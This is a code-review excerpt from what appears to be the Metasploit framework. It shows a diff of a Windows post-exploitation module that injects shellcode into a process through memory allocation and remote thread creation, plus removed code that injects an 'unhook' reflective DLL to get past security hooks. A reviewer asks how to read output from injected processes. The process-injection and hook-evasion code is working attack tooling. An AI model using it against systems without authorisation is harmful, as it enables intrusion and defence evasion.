modules/post/windows/manage/shellcode_inject.rb

```diff
@@ -52,116 +50,70 @@ def run
-      cmd = "#{windir}\\Sysnative\\notepad.exe"
-    elsif bits == ARCH_X86 and client.arch == ARCH_X64
-      cmd = "#{windir}\\SysWOW64\\notepad.exe"
-    end
-
-    proc = client.sys.process.execute(cmd, nil, {
-      'Hidden' => datastore['HIDDEN'],
-      'Channelized' => datastore['CHANNELIZED'],
-      'Interactive' => datastore['INTERACTIVE']
-    })
-
-    return proc
-  end
-
-  def inject_unhook(p, bits)
-    if bits == ARCH_X64
-      dll_file_name = 'x64.dll'
-      vprint_status("Assigning payload ext_server_unhook.x64.dll")
-    elsif bits == ARCH_X86
-      dll_file_name = 'x86.dll'
-      vprint_status("Assigning payload ext_server_unhook.x86.dll")
-    else
-      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign unhook dll")
-    end
-
-    dll_file = MetasploitPayloads.meterpreter_ext_path('unhook', dll_file_name)
-    print_status("Injecting unhook Reflective DLL into process ID #{p.pid}")
-    dll, offset = inject_dll_into_process(p, dll_file)
-    print_status("Executing unhook")
-    p.thread.create(dll + offset, 0)
-    print_status("Waiting #{datastore['WAIT_UNHOOK']} seconds for unhook Reflective DLL to be executed...")
-    Rex.sleep(datastore['WAIT_UNHOOK'])
-  end
-
-  def inject(shellcode, p)
-    print_status("Injecting shellcode into process ID #{p.pid}")
-    begin
-      print_status("Allocating memory in process #{p.pid}")
-      mem = inject_into_process(p, shellcode)
-      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode")
-      p.thread.create(mem, 0)
-      print_good("Successfully injected payload into process: #{p.pid}")
-
-      if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
-        print_status("Interacting")
-        client.console.interact_with_channel(p.channel)
-      elsif datastore['CHANNELIZED'] && datastore['PID'] == 0
-        print_status("Retrieving output")
-        data = p.channel.read
-        print_line(data) if data
-      elsif datastore['CHANNELIZED'] && datastore['PID'] != 0
-        print_warning("It's not possible to retrieve output when injecting existing processes.")
-      end
-    rescue ::Exception => e
-      print_error("Failed to inject Payload to #{p.pid}!")
-      print_error(e.to_s)
+  def inject(shellcode, proc)
+    mem = inject_into_process(proc, shellcode)
+    proc.thread.create(mem, 0)
+    print_good("Successfully injected payload into process: #{proc.pid}")
+    if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
+      print_status("Interacting")
+      client.console.interact_with_channel(proc.channel)
+    elsif datastore['CHANNELIZED'] && datastore['PID'] == 0
+      print_status("Retrieving output")
+      data = proc.channel.read
+      print_line(data) if data
+    elsif datastore['CHANNELIZED'] && datastore['PID'] != 0
+      print_warning("It's not possible to retrieve output when injecting existing processes.")
```

Comment:
any idea on how to get output from existing processes?

https://docs.microsoft.com/en-us/windows/console/allocconsole
https://docs.microsoft.com/en-us/windows/console/attachconsole